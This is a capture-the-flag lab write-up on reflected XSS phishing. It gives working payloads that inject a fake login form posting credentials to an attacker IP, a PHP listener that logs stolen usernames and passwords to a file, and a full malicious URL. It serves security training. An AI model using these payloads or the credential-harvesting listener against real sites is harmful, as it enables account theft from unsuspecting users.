LinkedInGitHub

Phishing

Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.

In many online forums and web applications, there are opportunities to manipulate how a page displays content through a technique known as Cross-Site Scripting (XSS). XSS is a security vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users. When we attempt to use a basic XSS payload, we might find that it doesn’t execute as expected, often resulting in an error icon that indicates a broken image link. This is a common issue when the application has security measures in place to prevent such injections.

Step 1: Understanding the Target Application

  1. Identify the Input Field: Locate the input field where user input is accepted (e.g., an image URL input).

  2. Analyze the Output: Use browser developer tools (F12) to inspect how your input is rendered in the HTML.

    • <html lang="en">
<body style="background-color: #141d2b; font-family: sans-serif; color: white;">
    <!-- --SNIP-- -->
    <img src='test'>
</body>
</html>

Step 2: Initial Payload Testing

  1. Basic XSS Payload: Start with a simple payload:

<script>alert(1);</script>

  • Input this into the image URL field and submit.

  • If the alert box appears, you have confirmed an XSS vulnerability.

  1. Check for Output Encoding: If the payload does not execute, check for HTML entities (e.g., &lt; for <).

Step 3: Crafting a Working Payload

  1. Bypass Filters: If basic payloads are blocked, try variations:

    • Use alternative tags or attributes;

    • Incorporate Special Characters: 

'><script>alert(1);</script>

  1. Inspecting the HTML Output: After submitting your payload, view the page source to see how your input is rendered.

Step 4: Developing the Phishing Payload

  1. Create a Login Form: Use document.write() to inject the phishing form:

document.write('<h3>Please login to continue</h3><form action=http://YOUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

  1. Remove Existing Elements: To make the phishing form more convincing, remove the original input field:

document.getElementById('urlform').remove();

  1. Combine the Code: Your final payload might look like this:

document.write('<h3>Please login to continue</h3><form action=http://YOUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove()

Step 5: Setting Up the Listener

  1. Using PHP: Create a PHP script to log the credentials:

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://YOUR_SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

  • Save this as index.php and run a PHP server:

sudo php -S 0.0.0.0:80

Step 6: Executing the Attack

  1. Craft the Malicious URL: Combine the target URL with your payload:

http://YOUR_SERVER_IP/phishing/index.php?url='><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.32><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove()</script>;<!--

  1. Send the URL:

  1. Capture Credentials: When a victim logs in, their credentials will be sent to your server, and you can check creds.txt for the captured information.

Step 7: Test the captured the credentials

  1. Go to http://SERVER_IP/phishing/login.php and enter the captured credentials to retrieve the flag:

PreviousXSS DiscoveryNextSession Hijacking

Last updated